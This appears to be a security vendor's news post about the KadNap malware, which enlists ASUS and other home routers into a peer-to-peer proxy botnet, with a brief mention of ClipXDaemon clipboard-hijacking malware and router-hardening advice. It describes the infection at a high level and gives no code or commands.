KadNap Malware Infects 14,000 Edge Devices

KadNap Malware Infects 14,000 Edge Devices

KadNap Malware Infects 14,000 Edge Devices in a growing cyber campaign. Researchers recently uncovered this new malware threat. However, the attack mainly targets network edge devices.

Most infections involve routers used in homes and small offices. Therefore, many victims may not notice the compromise. Reports show that more than 60% of infected devices are located in the United States. However, infections also appear in several other regions. These include Taiwan, Hong Kong, and multiple European countries. Therefore, the campaign now spans a global network.

Routers Become Part of a Hidden Botnet

KadNap primarily targets routers made by ASUS. However, attackers also infect other edge networking devices. As a result, many different systems join the malicious network.

Once infected, the devices become part of a proxy botnet. This network helps attackers route malicious traffic through victim devices. Therefore, criminals can hide their real locations. The botnet is later sold through a proxy service. One such service, Doppelgänger, markets these infected devices. It claims to offer anonymous proxies in dozens of countries.

Peer-to-Peer Technology Hides the Attack

The malware uses the Kademlia Distributed Hash Table protocol. This peer-to-peer technology helps hide command servers. Therefore, defenders struggle to trace the attackers. Instead of contacting a single server, devices connect to other infected nodes. These nodes share information within the network. As a result, the botnet becomes harder to disrupt.

Researchers say this design helps avoid traditional monitoring tools. The network traffic appears similar to normal peer-to-peer activity. Therefore, many systems overlook the malicious communication.

Infection Chain and Persistence

The infection begins with a shell script downloaded from a command server. This script starts the botnet enrollment process. However, the victim rarely notices the activity. The script creates a scheduled task on the router. Therefore, it runs again every hour automatically. This process ensures the malware stays active.

Afterward, the script downloads a malicious executable file. It renames the file and launches it silently. As a result, the KadNap malware becomes fully operational.

Device Information and Network Control

KadNap collects system details from infected devices. For example, it checks system uptime and current time. Therefore, the malware can generate unique identifiers.

The malware then connects to other peers in the network. It receives commands or additional files from these nodes. As a result, attackers maintain control over the botnet. Some scripts also close SSH port 22 on the device. This step prevents other users from accessing the router. Therefore, attackers maintain exclusive control.

Proxy Network Used for Cybercrime

Researchers discovered that the proxy network is already active. Threat actors are using it to route malicious activities. However, identifying the exact criminals remains difficult.

Some devices may also contain other malware. Therefore, multiple groups may share the same infrastructure. This situation complicates attribution. Experts warn that decentralized botnets are increasingly common. These networks resist takedown attempts. Therefore, they remain active for long periods.

Researchers also reported another Linux-based threat. The malware, called ClipXDaemon, targets cryptocurrency users.

This malware monitors the clipboard continuously. When users copy a wallet address, it replaces it with another address. Therefore, attackers steal cryptocurrency payments. The malware runs mostly in memory to avoid detection. It also disguises itself as normal system processes. As a result, many users never notice the attack.

How to Prevent Router and Malware Attacks

Users should update router firmware regularly. However, many devices run outdated software for years. Therefore, attackers easily exploit them.

Organizations should monitor network devices for unusual connections. In addition, managed detection and response services can detect suspicious traffic from compromised routers. Regular vulnerability assessments also help identify weak edge devices before attackers exploit them.

Sleep well, we got you covered.